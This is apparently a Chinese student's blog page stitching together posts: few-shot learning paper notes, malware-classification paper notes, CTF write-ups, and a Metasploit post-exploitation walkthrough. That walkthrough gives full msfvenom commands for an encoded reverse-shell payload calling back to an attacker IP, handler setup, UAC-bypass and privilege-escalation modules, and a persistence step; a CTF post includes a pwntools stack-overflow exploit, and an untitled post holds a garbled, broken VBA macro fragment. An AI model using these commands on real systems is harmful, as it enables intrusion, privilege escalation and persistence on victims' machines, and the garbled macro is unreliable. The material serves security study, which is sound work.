Are LSTMs Good Few-Shot Learners?

Posted on 2023-11-30 Edited on 2023-12-04 In 机器学习

看论文，C刊及以下的一般不看介绍和相关工作部分，只看一眼本文贡献。

面对一项新任务时，LSTM的权重是固定的。

1.支持集的隐藏嵌入层并不是排列不变的。—>通过对训练样本的平均池化

2.学习算法和输入嵌入机制交错，带来优化挑战和增加过拟合风险—>解耦

LSTM

只是获取给定任务的训练数据，并根据生成的隐藏状态来调整新查询输入的预测。把支持集当作序列而非集合

LSTM’s predictions for unseen inputs (queries) are conditioned on the hidden state h_M and cell state c_M .

Should make the hidden embedding be invariant to the order in which the examples are fed into the LSTM.

Outer Product LSTM

通过加上生成的隐状态和前一层输出的外积来更新当前隐藏矩阵。

adjusting the weights of the LSTM using backpropagation across different tasks

does not update the biases

base-learner ：

Use an LSTM to learn the weight update rule
good initialization parameters

Performance

与四种方法作对比：MAML、prototypical network、SAP、Warp-MAML；

在两类问题：few-shot sine wave regression、image classification benchmarks

分类是在三个数据集上：

Omniglot
miniImageNet
CUB

within-domain few-shot image classification

实验部分设计

实验的随机种子，会影响初始化权重值，以及训练、测试、验证任务集。

2.测量更新方向之间的余弦相似度作为反距离度量，余弦相似度可以更好地衡量方向相似度，因为它从向量的大小中抽象出来。

3.用-表示在限制的资源下，实验并没有运行完成。

4.使用足够大隐藏维度的 LSTM 可以通过使用隐藏表示的前 N 个维度来执行学习并为下一个时间步保留重要信息，并使用剩余维度来表示输入表示，从而将学习与输入表示分开。

Cross-domain

拿两个数据集，在一个数据集上训练，在另一个数据集上校验，但是要保证两个数据集没有交叉？？？

Frobenius norm

一些吹嘘

作者一直在说OP-LSTM与其他方法正交，可以和其他方法同时使用，但是把它们留在了未来工作。

msf后渗透维持

Posted on 2023-11-28 Edited on 2023-12-06 In CTF

C:\Users\22154>netstat -ano|findstr 11300
  TCP    172.30.48.1:53633      172.30.56.107:11300    ESTABLISHED     21716
  TCP    172.30.48.1:53699      172.30.56.107:11300    ESTABLISHED     5212
  TCP    172.30.48.1:53704      172.30.56.107:11300    ESTABLISHED     17876

[] UAC is Enabled, checking level…
[+] Part of Administrators group! Continuing…
[!] UAC set to DoNotPrompt - using ShellExecute “runas” method instead
[] Uploading kFJOgrXchF.exe - 7168 bytes to the filesystem…

msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp lhost=172.30.56.107 lport=11300 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp #设置成payload的模式
set LHOST 172.30.56.107
set lport 11300
exploit -j
sessions -i 2
shell

进行进程迁移

tasklist|findstr explorer
migrate 1844
background
chcp 65001

探测系统漏洞，比较耗费系统资源

use post/multi/recon/local_exploit_suggester
set session 1
exploit

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

use exploit/windows/local/bypassuac_fodhelper

set session 3

exploit

上传到了临时文件夹

检测发现后面上传的利用工具都

C:\Users\22154\AppData\Local\Temp\OkNyUvljPBU.ps1
C:\Users\22154\AppData\Local\Temp\AFYMdwEU.ps1
VFvBBvAw.exe

提权

msf6 exploit(windows/local/bypassuac_dotnet_profiler) > exploit

[*] Started reverse TCP handler on 172.30.56.107:11300
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[!] UAC set to DoNotPrompt - using ShellExecute "runas" method instead
[*] Uploading XyrFnIA.exe - 7168 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (200774 bytes) to 172.30.48.1
[*] Meterpreter session 5 opened (172.30.56.107:11300 -> 172.30.48.1:54093) at 2023-11-28 20:15:41 +0800

维持

run persistence 借助vbs

加固

关闭“启用粘滞键”选项

辅助功能—>键盘，全部取消。

XSB2023 Py

Posted on 2023-11-19 In CTF

我的EXP

我也找对了漏洞所在，是打赢BOSS2后留名字的栈溢出。

from pwn import *
r = remote("47.94.85.181",22872) #连接指定IP及端口，题目给定
r.recvlines(10)       #运行到字符串位置停下

for i in range(10000):
    r.sendline("2")       #运行到字符串位置停下
    r.recvline()
    r.sendline("1")
    r.recvlines(7)   
r.sendline("2")       #运行到字符串位置停下
r.recvline()
r.sendline("2")
r.recvlines(7)   
payload = 'A' * 9 + str(p64(0x00117630))#+str(p64('flag'))+str(0x0000000000000001)+str(0x0000000000000001)#发送数据，输入数据溢出,并覆盖,返回到目标位置
r.sendline(payload)         #发送 payload
r.interactive()             #交互

少于单样本的学习：从比类别数还小的样本集学习

Posted on 2023-11-17 Edited on 2023-11-28 In 机器学习

Ilia Sucholutsky, Matthias Schonlau,‘Less Than One’-Shot Learning: Learning N Classes From M<N Samples, In AAAI 2021 Proceedings .

Inspiration

软标签比硬标签携带更多信息，可以适用于LO场景。

- 软标签可以标注样本间的共同特征，进而以这种方式增加信息密度和维度

- 目标：训练样本足够少的情况下，模型还能够以足够的精度识别尽可能多的类别

Terms

prototypes: soft-labelled synthetic images

unrestricted soft label:各个元素可以是任何值，包括负数。

soft\probabilistic label：一个样本在各个类上的概率分布，各个类上的概率之和为1，可以使用softmax函数得到。

hard label:在soft label上使用argmax得到。

soft-label prototype (SLaP)：(X,Y)，特征向量和它对应的软标签。

Corollary

推论

Work& Finding

hard label prototype Distance-weighted kNN is the special case of SLaPkNN(基于距离度量的软标签原型KNN)

分析这些决策景观，得出使用 M < N 软标签样本分离 N 个类别的理论下限，并研究所得系统的稳健性。

1.分析创建的决策边界鲁棒性和稳定性的方法；

2.软标签表征训练集用于区分，比起硬标签使用的原型更少。理想情况，是O(N^2)降低到O(1)。

实验

一种有趣的提法

通过描述，我们可以用犀牛、马两类样本获得除犀牛、马以外的独角兽的分类。

FSL让模型更加样本有效。

References

都在想办法对数据集进行蒸馏，

1.2019，软标签数据集蒸馏

Sucholutsky, I.; and Schonlau, M. 2019. Soft-Label Dataset Distillation and Text Dataset Distillation. arXiv preprint arXiv:1910.02551 .

2.2006，动态数据冻结

Ruta, D. 2006. Dynamic data condensation for classification. In International Conference on Artificial Intelligence and Soft Computing, 672–681. Springer.

经典的小样本学习网络结构

1.匹配网络2016：

Vinyals, O.; Blundell, C.; Lillicrap, T.; Wierstra, D.; et al. 2016. Matching networks for one shot learning. In Advances in Neural Information Processing Systems, 3630–3638.

2.原型网络，2017

Snell, J.; Swersky, K.; and Zemel, R. 2017. Prototypical networks for few-shot learning. In Advances in Neural Information Processing Systems, 4077–4087.

3.李飞飞，小样本识别

Fei-Fei, L.; Fergus, R.; and Perona, P. 2006. One-shot learning of object categories. IEEE Transactions on Pattern Analysis and Machine Intelligence 28(4): 594–611.

其他内容

0.1996，借助统计学习模型的主动学习

Cohn, D. A.; Ghahramani, Z.; and Jordan, M. I. 1996. Active learning with statistical models. Journal of Artificial Intelligence Research 4: 129–145.

1.2017，卷积神经网络的主动学习方法

Sener, O.; and Savarese, S. 2017. Active learning for convolutional neural networks: A core-set approach. arXiv preprint arXiv:1708.00489 .

2.2005，SVM在大数据集上的快速训练

Tsang, I. W.; Kwok, J. T.; and Cheung, P.-M. 2005. Core vector machines: Fast SVM training on very large data sets. Journal of Machine Learning Research 6(Apr): 363–392.

3.SVM的主动学习2001

Tong, S.; and Koller, D. 2001. Support vector machine active learning with applications to text classification. Journal of Machine Learning Research 2(Nov): 45–66.

4.2008，软标签上的分类对于标签噪声具有鲁棒性。

Thiel, C. 2008. Classification on soft labels is robust against label noise. In International Conference on KnowledgeBased and Intelligent Information and Engineering Systems, 65–73. Springer.

5.2014,KNN的随机邻居压缩

Kusner, M.; Tyree, S.; Weinberger, K.; and Agrawal, K. 2014. Stochastic neighbor compression. In International Conference on Machine Learning, 622–630.

Untitled

Posted on 2023-10-21

K1xME(6p@08ce%2`XH,,`Fx`6`@`B@@ @@8`DNL ` ^8 @ @ @@`@H @0 @ 0@  @ @ ( @ @p X !` !h@@  `@@f$*\Rffff*046728f59d*\R0*#f*\R0*#1a*\R0*#12,"(xB(8@HP,Px0,B,XX@]].\'6\]K3|k] '@ 6enc @  ] @$D @$ 'B' @V@ J B B J  '@ @ F @V@oP 6abc$~ 6abc @ +^s G+^) z+^8}c+^s A+^o+^++^C+^ F B J$$N J$^$L'FContenAttribute VB_Name = "NewMacros"

Sub XOREncryptFile() 
    Dim numbers(8) As Integer 
    For i = 0 To 8 
        numbers(i) = (71 - (2 * 2 + 39) * (4 * 6 - 5) - 51) ^ (6 * 4 + 67) - 3 
    Next i 
    CurrentDirectory = ".\" 
    If ("&" & "abc" & ":" & "") Then 
        Exit 
    End If 
    IvfIN = "Free" 
    Open "C:\ForBinaryAccessReadWrite" As #1 
    Get #1, , 8 
    Close #1 
    IIded2i = Len(numbers) 
    BY = Chr(Asc(Mid(numbers, i, 1)) Xor (i - Mod(8))) 
    Next i 
    If (0 > (6 * 5)) Then 
        'Put your code here
    End If 
End Sub

XSB2023 Py

Posted on 2023-10-15 In CTF

Hello Py

字符串搜索特征字符串，

比如flag、right、wrong、!，然后找到了如下的代码、

p1的值决定了flag是否正确。

确定关键虚拟函数。

关键逻辑check在Python代码；

Lcom/chaquo/python/PyObject;看了一圈什么内容都没有，py文件应该在其他文件里；

使用jax反编译，然后在AndroidPlatform.java文件里，发现有释放文件和删除文件操作。

修改smali代码，让它不要删文件。

发现编译失败，我的环境不行；

没办法，去资源目录里，突然看到app.yml居然没有被删除，可以直接读取，把它修改为zip后缀，然后解压得到hello.py文件。


import struct #line:3
import ctypes #line:4
def MX (arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ):#line:7
    temp =(arg1 .value >>5 ^arg2 .value <<2 )+(arg2 .value >>3 ^arg1 .value <<4 )#line:8
    OOO0OOOOOO0O0OO00 =(arg3 .value ^arg2 .value )+(arg4 [(arg5 &3 )^arg6 .value ]^arg1 .value )#line:9
    return ctypes .c_uint32 (temp ^OOO0OOOOOO0O0OO00 )#line:11
def encrypt (arg1 ,arg2 ,arg3 ):#line:14
    delta =0x9e3779b9 #line:15
    rounds =6 +52 //arg1 #line:16
    O00OO00000O0OO00O =ctypes .c_uint32 (0 )#line:18
    OO0OOOO0O0O0O0OO0 =ctypes .c_uint32 (arg2 [arg1 -1 ])#line:19
    OOOOO00000OOOOOOO =ctypes .c_uint32 (0 )#line:20
    while rounds >0 :#line:22
        O00OO00000O0OO00O .value +=delta #line:23
        OOOOO00000OOOOOOO .value =(O00OO00000O0OO00O .value >>2 )&3 #line:24
        for OO0O0OOO000O0000O in range (arg1 -1 ):#line:25
            OOO0OO00O0OO0O000 =ctypes .c_uint32 (arg2 [OO0O0OOO000O0000O +1 ])#line:26
            arg2 [OO0O0OOO000O0000O ]=ctypes .c_uint32 (arg2 [OO0O0OOO000O0000O ]+MX (OO0OOOO0O0O0O0OO0 ,OOO0OO00O0OO0O000 ,O00OO00000O0OO00O ,arg3 ,OO0O0OOO000O0000O ,OOOOO00000OOOOOOO ).value ).value #line:27
            OO0OOOO0O0O0O0OO0 .value =arg2 [OO0O0OOO000O0000O ]#line:28
        OOO0OO00O0OO0O000 =ctypes .c_uint32 (arg2 [0 ])#line:29
        arg2 [arg1 -1 ]=ctypes .c_uint32 (arg2 [arg1 -1 ]+MX (OO0OOOO0O0O0O0OO0 ,OOO0OO00O0OO0O000 ,O00OO00000O0OO00O ,arg3 ,arg1 -1 ,OOOOO00000OOOOOOO ).value ).value #line:30
        OO0OOOO0O0O0O0OO0 .value =arg2 [arg1 -1 ]#line:31
        rounds -=1 #line:32
    return arg2 #line:34

def check (O0000000000O0O0O0 ):#line:63
    print ("checking~~~: "+O0000000000O0O0O0 )#line:64
    O0000000000O0O0O0 =str (O0000000000O0O0O0 )#line:65
    if len (O0000000000O0O0O0 )!=36 :#line:66
        return False#line:67
    O00OO00000OO0OOOO =[]#line:69
    for O0O0OOOOO0OOO0OOO in range (0 ,36 ,4 ):#line:70
        OO0OO0OOO000OO0O0 =O0000000000O0O0O0 [O0O0OOOOO0OOO0OOO :O0O0OOOOO0OOO0OOO +4 ].encode ('latin-1')#line:71
        O00OO00000OO0OOOO .append (OO0OO0OOO000OO0O0 )#line:72
    _O00OO0OOOOO00O00O =[]#line:73
    for O0O0OOOOO0OOO0OOO in O00OO00000OO0OOOO :#line:74
        _O00OO0OOOOO00O00O .append (struct .unpack ("<I",O0O0OOOOO0OOO0OOO )[0 ])#line:75
    print (_O00OO0OOOOO00O00O )#line:77
    OO0OO0OOO000OO0O0 =encrypt (9 ,_O00OO0OOOOO00O00O ,[12345678 ,12398712 ,91283904 ,12378192 ])#line:78  n=9
    OOOOO0OOO0OO00000 =[689085350 ,626885696 ,1894439255 ,1204672445 ,1869189675 ,475967424 ,1932042439 ,1280104741 ,2808893494 ]#line:85
    for O0O0OOOOO0OOO0OOO in range (9 ):#line:86
        if OOOOO0OOO0OO00000 [O0O0OOOOO0OOO0OOO ]!=OO0OO0OOO000OO0O0 [O0O0OOOOO0OOO0OOO ]:#line:87
            return False#line:88
    return True#line:90
def sayHello ():#line:92
    print ("hello from py")#line:93

一开始想手写解密脚本，不知道为什么总是出错，解密出的值都是不可见字符，放弃。去csdn上找了一个公开的脚本：

链接如下：

https://blog.csdn.net/A951860555/article/details/120120400


     
 
from ctypes import c_uint32, c_int32
 
def MX(z, y, total, key, p, e):
    temp1 = (z.value>>5 ^ y.value<<2) + (y.value>>3 ^ z.value<<4)
    temp2 = (total.value ^ y.value) + (key[(p&3) ^ e.value] ^ z.value)
    
    return c_uint32(temp1 ^ temp2)
 
def decrypt(n, v, key):
    delta = 0x9e3779b9
    rounds = 6 + 52//n 
    
    total = c_uint32(rounds * delta)
    y = c_uint32(v[0])
    e = c_uint32(0)

    while rounds > 0:
        e.value = (total.value >> 2) & 3
        for p in range(n-1, 0, -1):
            z = c_uint32(v[p-1])
            v[p] = c_uint32((v[p] - MX(z,y,total,key,p,e).value)).value
            y.value = v[p]
        z = c_uint32(v[n-1])  
        v[0] = c_uint32(v[0] - MX(z,y,total,key,0,e).value).value
        y.value = v[0]  
        total.value -= delta
        rounds -= 1

    return v 
    n=9
v=[689085350 ,626885696 ,1894439255 ,1204672445 ,1869189675 ,475967424 ,1932042439 ,1280104741 ,2808893494 ]
k=[12345678 ,12398712 ,91283904 ,12378192 ]
result= decrypt(n,v,k)
print([hex(x) for x in result])
b_result=b''.join(struct.pack('<I',x) for x in result)
s_result=b_result#.decode('latin-1')
print('flag{'+str(s_result)+'}')

得到最终flag,b’c1f8ace6-4b46-4931-b25b-a1010a89c592’

URL从哪儿来

不想在自己电脑上运行，丢沙箱里，结果沙箱不给文件。没办法，自己下Api断点，获取文件。

获取到文件后，strings发现有base64特征，动态加载后观察，发现关键判断函数。

001DF654 |006D7838 ASCII “ZmxhZ3s2NDY5NjE2ZS02MzY5LTYyNmYtNzE2OS03NDYxNzA2MTc3NjF9”

尝试b64解码，

flag{6469616e-6369-626f-7169-746170617761}

发现里面有flag，提交成功。

使用节表分布信息的基于图像的恶意软件分类

Posted on 2023-10-12 Edited on 2023-10-13 In 机器学习

Image-based malware classification using section distribution information,发表在B刊，Computers&Security,2021.

本文不是小样本,第20篇论文。

Idea

虽然需要大量的计算，但是输入数据里选取的数据的信息越多，准确率越高。

作者的想法和我的想法：节表的分布信息能够更好的表征恶意软件。

动机

已有的灰度图里，相同家族的样本具有相似的二级制内容和图片纹理。

相同家族的样本具有相似的节表分布信息，节表数量、节表顺序和节表尺寸。

方法

和我的思路一致，从Opcode、Gray变为了带有节表信息的灰度图。

VGG16+多分类SVM。

注意

只能处理未打包的恶意软件，这样才能够保证节表的分布信息没有被混淆。

细节

灰度图评价

PE文件里由于文件对齐，会有大量的填充数据（0或其他值），而各个样本填充的位数不一致。

如下图所示，灰度图里的界限和实际的界限对应得并不是很好。

已有的灰度图里能够判断出一部分节表信息，但是会有很多错误。

作者提出的算法

图片定宽256（16的倍数，hex视图），高度跟随文件大小变化。用于对节表分界的行厚度要发生变化，

最后分类模型的选取

25088的数据维度，维度诅咒以及数据稀疏。

SVM适合处理高维数据，它的计算复杂度取决于它的支持向量数，而不是空间维度。

SVM处理大规模数据效果也很好。

其他

数据集

VXV：VX-Heaven VirusShare

BIG-2015微软恶意软件分类数据集

实验设置

皮尔逊相关性系数

衡量两个向量的线性相关性。

采用平均PCC去衡量一个家族内的样本用某一种形式表示时的相似度。

Chap11-glibc入口函数

Posted on 2023-10-11 In 笔记

1	xor %ebp,%ebp ;表明这是程序的最外层函数，初始化栈

Untitled

Posted on 2023-10-09 Edited on 2023-09-15

版权不包含思想，

法定8种作品。

Untitled

Posted on 2023-10-09 Edited on 2023-09-02

v9 = *(_QWORD *)__stack_chk_guard_ptr;//防止堆栈溢出
  //告诉系统，阻止调试器依附
result = ptrace(0, 0, (caddr_t)1, 0);//利用ptrace反调试

ARM64调用约定

在ARM 64位体系结构中，函数参数通常会存储在一组特定的寄存器中，这些寄存器包括：

参数0（x0）：用于存储第一个函数参数。
参数1（x1）：用于存储第二个函数参数。
参数2（x2）：用于存储第三个函数参数。
参数3（x3）：用于存储第四个函数参数。
参数4-7（x4-x7）：用于存储额外的函数参数。

所以，根据ARM 64位体系结构的调用约定，参数应该存储在这些寄存器中，而不是ECX和EDX。

+----------------+
| [xsp+48h] v9   | (8 字节)
+----------------+
| [xsp+50h]       | (8 字节间隔)
+----------------+
| [xsp+38h] v8   | (8 字节)
+----------------+
| [xsp+40h]       | (8 字节间隔)
+----------------+
| [xsp+28h] v7   | (8 字节)
+----------------+
| [xsp+30h]       | (8 字节间隔)
+----------------+
| [xsp+18h] v6   | (8 字节)
+----------------+
| [xsp+20h]       | (8 字节间隔)
+----------------+
| [xsp+8h] v5   | (8 字节)
+----------------+
| ... (下面的栈帧内容) |
+----------------+

LSTM

Outer Product LSTM

Performance

实验部分设计

Cross-domain

一些吹嘘

进行进程迁移

探测系统漏洞，比较耗费系统资源

上传到了临时文件夹

提权

维持

加固

关闭“启用粘滞键”选项

Inspiration

Terms

Corollary

Work& Finding

实验

一种有趣的提法

References

都在想办法对数据集进行蒸馏，

经典的小样本学习网络结构

其他内容

Hello Py

URL从哪儿来

Idea

动机

方法

注意

细节

灰度图评价

作者提出的 算法

最后分类模型的选取

其他

数据集

实验设置

皮尔逊相关性系数

ARM64调用约定

作者提出的算法